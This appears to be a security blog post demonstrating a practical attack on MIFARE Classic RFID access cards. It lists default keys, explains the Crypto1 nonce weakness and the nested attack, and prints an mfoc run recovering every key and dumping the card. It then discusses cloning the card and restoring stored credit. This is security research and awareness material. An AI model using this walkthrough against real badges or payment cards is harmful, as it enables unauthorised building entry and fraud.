Introduction

Our previous posting on Access Control Part 1: Magstripes Revisited, demonstrated the use and subversion of magstripe technology. RFID is our future, and unless implemented in a secure fashion – it to can be vulnerable to attack.

Below we will walk through a valid attack methodology, including hardware and software, that can be used to subvert some RFID Access Control Systems.

The organisations that tend to be vulnerable are early adopters of the technology, and in some cases departments that have a fixed limited security budget?

Mifare Specification

Overview

One of the most used RFID cards (13.56MHz), based on ISO14443 A/B standard and uses the proprietary crypto1 algorithm with 48bit keys. These cards are relativity cheap and cost approximately £1(GBP) each.

Technical Details

Below is a simplified depiction of the layout of a Mifare RFID card. I am only demonstrating the first 2 Sectors, as Sector 1 layout is typically repeated right down to Sector 15 (Mifare 1K card):

Sector Block | 16 Byte Data Field | Read/Write --------------------------------------------- Sec 0 Block 0| UID | Manufacturer Data | Read Only Sec 0 Block 1| Mifare Application Directory | R/W Sec 0 Block 2| Mifare Application Directory | R/W Sec 0 Block 3| Key A |Permissions | Key B --------------------------------------------- Sec 1 Block 0| Data | R/W Sec 1 Block 1| Data | R/W Sec 1 Block 2| Data | R/W Sec 1 Block 3| Key A |Permissions | Key B --------------------------------------------- ...

Security Features

Read­-only Unique Identifier (UID)

Unique Identifier (UID) Mutual authentication between reader and writer and encrypted communication

CRYPTO1 non­public algorithm implementation obfuscated parity information

default keys

Manufactures pre-load Mifare cards with default keys – these can be found within their design/specification documentation, below is a list of the most common default keys. These are extremely useful to know when trying to crack Mifare RFID cards:

0x000000000000

0xffffffffffff

0xa0a1a2a3a4a5

0xb0b1b2b3b4b5

0x4d3a99c351dd

0x1a982c7e459a

0xd3f7d3f7d3f7

0xaabbccddeeff

Crypto1 Weakness + LSFR

No non-linear feedback

LSFR

The Linear Shift Feedback Registers have always received considerable attention in cryptography. Owing to the good statistical properties, large period and low implementation costs, LFSR have achieved wide acceptance in developing stream ciphers. LFSRs are notoriously insecure from a cryptographic standpoint because the structure of an n-bit LFSR can be easily deduced by observing 2n consecutive bits. Due to the inherent linearity, LFSR based stream ciphers are susceptible to several general attacks including fast correlation attack, algebraic attack, cache timing attack,known plaintext attack meet-in-the middle consistency attack, best affine approximation attack, and the derived sequence attack

pseudo random generation defined by the polynomial x^16 + x^14 + x^13 + x^11 + 1

length is 32 bits, but it has only 16 bits entropy! L16 = x0 XOR x11 XOR x13 XOR x14 XOR x16 Ar = suc2(Nt), At = suc3(Nt)

generated nonces can be predicted in the time

Recover Keys Using Nested Attack

Authenticate to Block X with a Default Key (above), read the Tag’s Nt (determined by LFSR)

Authenticate to same Block with same key and read Tag’s Nt’ (this is in an encrypted session)

Compute timing distance

Guess Nt value and authenticate to next Block

Tools

Hardware

Tikitag – $40(USD) – http://www.acs.com.hk/index.php?pid=product&id=ACR122U

Proxmark 3 – $400(USD) – http://proxmark3.com

Software

Android NFC Apps (Selection)

MFOC Example

Below is an example test-run of mfoc. One default sector key leads to the entire card becoming compromised!

$ mfoc -O out.mfd Found MIFARE Classic 4K card with uid: 3b0e943f [Key: ffffffffffff] -> [........................................] [Key: a0a1a2a3a4a5] -> [x..x....................................] [Key: b0b1b2b3b4b5] -> [x..x....................................] [Key: 000000000000] -> [x..x....................................] [Key: 4d3a99c351dd] -> [x..x....................................] [Key: 1a982c7e459a] -> [x..x....................................] [Key: aabbccddeeff] -> [x..x....................................] Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B] Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B] Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B] Sector 03 - FOUND_KEY [A] Sector 03 - UNKNOWN_KEY [B] Sector 04 - UNKNOWN_KEY [A] Sector 04 - UNKNOWN_KEY [B] Sector 05 - UNKNOWN_KEY [A] Sector 05 - UNKNOWN_KEY [B] Sector 06 - UNKNOWN_KEY [A] Sector 06 - UNKNOWN_KEY [B] ... Using sector 00 as an exploit sector Sector: 1, type A, probe 0, distance 32797 ..... Sector: 1, type A, probe 1, distance 30241 ..... Sector: 1, type A, probe 2, distance 29435 ..... Found Key: A [1494e81663d7] Sector: 16, type A, probe 21, distance 32837 ..... Sector: 16, type A, probe 22, distance 29443 ..... Sector: 16, type A, probe 23, distance 29433 ..... Sector: 16, type A, probe 24, distance 32843 ..... Found Key: A [6d59ee19b1c9] Sector: 17, type A Sector: 4, type B, probe 0, distance 32799 ..... Sector: 4, type B, probe 1, distance 32797 ..... Sector: 4, type B, probe 2, distance 32803 ..... Sector: 4, type B, probe 3, distance 29427 ..... Found Key: B [a24c49684d8e] Sector: 5, type B Sector: 36, type B, probe 0, distance 32797 ..... Sector: 36, type B, probe 1, distance 32845 ..... Sector: 36, type B, probe 2, distance 31087 ..... Sector: 36, type B, probe 3, distance 32797 ..... Sector: 36, type B, probe 4, distance 29431 ..... Sector: 36, type B, probe 5, distance 29441 ..... Found Key: B [107913b22a00] Sector: 37, type B, probe 0, distance 31137 ..... Sector: 37, type B, probe 1, distance 29437 ..... Sector: 37, type B, probe 2, distance 29431 ..... Sector: 37, type B, probe 3, distance 29441 ..... Found Key: B [6d4490b424d8] Sector: 38, type B Found Key: B [6d59ee19b1c9] Sector: 39, type B Found Key: B [6d59ee19b1c9] Auth with all sectors succeeded, dumping keys to a file! Block 255, type A, key 6d59ee19b1c9 :00 00 00 00 00 00 0f 00 ff 00 00 00 00 00 00 00 Block 254, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 253, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 252, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 251, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 250, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...

And the entire card is accessible.

Other Findings/Observations

A lot of Access Control Systems appear to store their data in Sector 14. This can be copied (cloned) to other mifare cards, or even manipulated to gain access to buildings/rooms/systems that were otherwise inaccessible 🙂

Considerations

Risks

Cloning Once all keys are recovered, can clone entire card (Chinese magic mifare – clone UID(usually Read-Only field)) T5557 cards can potentially clone hardcoded UID Proxmark 3 can clone card in emulation mode

Fraud Restore previous credit



Cost of Attack

$40(USD) – tikitag / touchatag RFID reader/writer (sufficient for reading / cracking / writing / cloning Mifare Classic cards)

$400(USD) – Proxmark 3 (just for advanced RFID cracking)

£1 for blank 4kB Mifare Classic (can be bought on ebay.com from Taiwan/China)

At a minimum of $41(USD) / £30(GBP) I could potentially walk straight through your organisations front door!

Related articles